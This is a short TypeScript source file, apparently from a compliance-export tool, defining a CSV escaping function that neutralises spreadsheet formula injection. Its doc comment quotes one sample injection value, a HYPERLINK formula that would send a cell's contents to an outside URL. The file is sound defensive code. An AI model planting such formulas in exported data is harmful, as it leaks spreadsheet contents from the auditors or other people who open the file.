// @greenlight-spec: 10-security-compliance.md#soc-2-evidence-view

/**
 * CSV quoting, plus the spreadsheet-specific escape quoting does not cover.
 *
 * A cell beginning `=`, `+`, `-` or `@` is a formula to Excel, Sheets and
 * LibreOffice, and quoting it changes nothing. App names, slugs, and BAA
 * counterparties are written by people and land straight in these rows, so a
 * value like `=HYPERLINK("https://…&"&A1)` would become a live link in an
 * auditor's spreadsheet — someone who opens the file precisely because
 * Greenlight generated it, on the surface this export exists to be read in.
 * Prefixing an apostrophe keeps the cell text.
 *
 * `\r` joins the quote test because a lone carriage return breaks row
 * boundaries in some parsers.
 *
 * Shared by every compliance export: a second copy is a second thing to keep
 * correct, and this one is load-bearing against formula injection.
 */
export function escapeCsvCell(value: string): string {
  const safe = /^[=+\-@\t\r]/.test(value) ? `'${value}` : value;
  return /[",\n\r]/.test(safe) ? `"${safe.replace(/"/g, '""')}"` : safe;
}
